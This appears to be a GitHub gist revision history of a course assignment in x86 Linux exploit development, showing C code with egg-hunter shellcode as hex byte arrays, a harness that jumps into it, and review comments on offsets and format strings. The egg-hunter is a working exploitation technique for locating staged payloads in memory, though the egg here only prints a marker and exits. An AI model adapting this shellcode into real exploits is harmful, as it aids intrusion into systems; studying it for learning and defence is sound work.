geyslan revised this gist
May 26, 2018 . No changes.There are no files selected for viewing
geyslan revised this gist
Apr 22, 2013 . 1 changed file with 10 additions and 6 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -7,7 +7,9 @@ unsigned char egg[] = \ // Write "Egg Mark" and exit "\x90\x50\x90\x50" // <- First Four Bytes of Signature "\x90\x50\x90\x50" // <- Same first bytes are mandatory (Repeat them) "\x31\xdb" "\xf7\xe3\xb0\x04\x6a\x0a\x68\x4d\x61\x72" "\x6b\x68\x45\x67\x67\x20\xb3\x01\x89\xe1" "\xb2\x09\xcd\x80\xb0\x01\xcd\x80"; @@ -16,10 +18,12 @@ unsigned char egghunter[] = \ // Search for the Egg Signature (0x50905090 x 2) - the Egg's 8 first instructions (nop, push eax, nop, push eax...) "\xfc\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f" "\x42\x6a\x21\x58\x8d\x5a\x04\xcd\x80\x3c" "\xf2\x74\xee\xb8" "\x90\x50\x90\x50" // <- Signature "\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7"; main () { @@ -40,7 +44,7 @@ main () // Setting the egg hunter signature to search (byte reverse order) "movl $0x50905090, (egghunter+24)\n\t" // Calling the shellcode "call egghunter"); -
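Review bot: The store `"movl $0x50905090, (egghunter+24)\n\t"` in the third hunk hard-codes the byte offset of the signature immediate inside the hunter, and this very revision had to bump it from 26 to 24 because the hunter shrank by two bytes — nothing catches the next drift, which would silently corrupt an instruction instead of rewriting the signature. Since the literal already carries `"\x90\x50\x90\x50" // <- Signature` at that offset, a self-check before the inline asm would pin the two together: `assert(memcmp(egghunter + 24, "\x90\x50\x90\x50", 4) == 0);` (this needs `#include <assert.h>`, which the file does not include yet). The egg comment `// <- Same first bytes are mandatory (Repeat them)` would also benefit from saying why: the hunter appears to do two consecutive `\xaf` (scasd) compares each followed by a `\x75` (jne), so a single copy of the signature — such as the hunter's own immediate — does not match, and only the doubled marker in the egg does. The `main ()` body that the third hunk touches starts and ends outside the hunk.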
geyslan renamed this gist
Mar 27, 2013 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
geyslan created this gist
Mar 27, 2013 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,48 @@ // This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/3rd.assignment/egg_hunter_shellcode.c #include <stdio.h> #include <string.h> unsigned char egg[] = \ // Write "Egg Mark" and exit "\x90\x50\x90\x50\x90\x50\x90\x50\x31\xdb" "\xf7\xe3\xb0\x04\x6a\x0a\x68\x4d\x61\x72" "\x6b\x68\x45\x67\x67\x20\xb3\x01\x89\xe1" "\xb2\x09\xcd\x80\xb0\x01\xcd\x80"; unsigned char egghunter[] = \ // Search for the Egg Signature (0x50905090 x 2) - the Egg's 8 first instructions (nop, push eax, nop, push eax...) "\xfc\x31\xf6\xf7\xe6\x66\x81\xca\xff\x0f" "\x42\x6a\x21\x58\x8d\x5a\x04\x56\x59\xcd" "\x80\x3c\xf2\x74\xec\xb8\x90\x50\x90\x50" "\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"; main () { // When contains null bytes, printf will show a wrong shellcode length. printf("Shellcode Length: %d\n", strlen(egghunter)); // Pollutes all registers ensuring that the shellcode runs in any circumstance. __asm__ ("movl $0xffffffff, %eax\n\t" "movl %eax, %ebx\n\t" "movl %eax, %ecx\n\t" "movl %eax, %edx\n\t" "movl %eax, %esi\n\t" "movl %eax, %edi\n\t" "movl %eax, %ebp\n\t" // Setting the egg hunter signature to search (byte reverse order) "movl $0x50905090, (egghunter+26)\n\t" // Calling the shellcode "call egghunter"); }
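Review bot: `printf("Shellcode Length: %d\n", strlen(egghunter));` passes a `size_t` to `%d`, which is a format/argument mismatch (undefined behavior, and flagged by `-Wformat`), and as the comment above it admits, `strlen` stops at the first embedded NUL byte so the reported length is only right by accident. Using the array size instead fixes both at once and makes the caveat comment unnecessary: `printf("Shellcode Length: %zu\n", sizeof egghunter - 1);`. `main ()` also relies on implicit `int`, which C99 removed; `int main(void)` keeps it compiling on current toolchains. It may also be worth a one-line comment on the `__asm__` block noting that it declares no clobbers because control never returns from `call egghunter` (the egg exits via `int 0x80`), so the compiler's register assumptions are never relied on — that reasoning is otherwise invisible to the next reader.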